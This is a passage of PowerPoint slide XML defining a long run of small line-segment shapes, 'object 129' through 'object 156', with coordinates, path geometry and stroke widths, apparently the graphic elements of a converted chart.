        <p:spPr>
          <a:xfrm>
            <a:off x="2408316" y="5728573"/>
            <a:ext cx="0" cy="3775"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1905">
                <a:moveTo>
                  <a:pt x="-2706" y="952"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="952"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="object 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436225" y="5729666"/>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130" name="object 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436224" y="5727478"/>
            <a:ext cx="0" cy="5033"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="2539">
                <a:moveTo>
                  <a:pt x="-2706" y="1228"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1228"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="object 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463584" y="5729392"/>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132" name="object 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463582" y="5726985"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1353"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1353"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="object 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491436" y="5729119"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="object 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491434" y="5726438"/>
            <a:ext cx="0" cy="6292"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3175">
                <a:moveTo>
                  <a:pt x="-2706" y="1491"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1491"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="object 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519341" y="5728861"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3507">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="object 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519340" y="5725891"/>
            <a:ext cx="0" cy="7550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="3810">
                <a:moveTo>
                  <a:pt x="-2706" y="1629"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="1629"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3258">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="object 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547195" y="5727521"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4860">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="object 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2547194" y="5723209"/>
            <a:ext cx="0" cy="10067"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="5080">
                <a:moveTo>
                  <a:pt x="-2706" y="2305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="2305"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4611">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="object 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2575101" y="5725906"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6489">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="object 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572376" y="5720283"/>
            <a:ext cx="3775" cy="12583"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="6350">
                <a:moveTo>
                  <a:pt x="0" y="5812"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="6088"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="object 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2603007" y="5726984"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="object 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630312" y="5725645"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6765">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="object 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2630310" y="5719981"/>
            <a:ext cx="2517" cy="12583"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="6350">
                <a:moveTo>
                  <a:pt x="974" y="5964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="5964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6240"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="object 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2658219" y="5724840"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="7566">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="object 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2656835" y="5719231"/>
            <a:ext cx="2517" cy="13842"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="6985">
                <a:moveTo>
                  <a:pt x="0" y="6342"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="6619"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="object 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2686125" y="5721075"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="11376">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="object 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2686125" y="5710051"/>
            <a:ext cx="1258" cy="22650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="11430">
                <a:moveTo>
                  <a:pt x="400" y="10975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="10975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="object 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713977" y="5721075"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="11376">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="object 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711509" y="5710051"/>
            <a:ext cx="2517" cy="22650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="11430">
                <a:moveTo>
                  <a:pt x="0" y="10975"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="11251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="object 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741885" y="5718136"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14331">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="object 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2741583" y="5701717"/>
            <a:ext cx="1258" cy="31459"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="15875">
                <a:moveTo>
                  <a:pt x="0" y="15180"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="15456"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="object 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769737" y="5718394"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="14082">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="object 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2769735" y="5707455"/>
            <a:ext cx="2517" cy="25167"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="12700">
                <a:moveTo>
                  <a:pt x="974" y="12285"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="12285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12561"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="object 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797095" y="5714373"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="18141">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="object 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796012" y="5698028"/>
            <a:ext cx="1258" cy="35234"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="17780">
                <a:moveTo>
                  <a:pt x="0" y="17042"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546" y="17318"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="object 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2825001" y="5711161"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
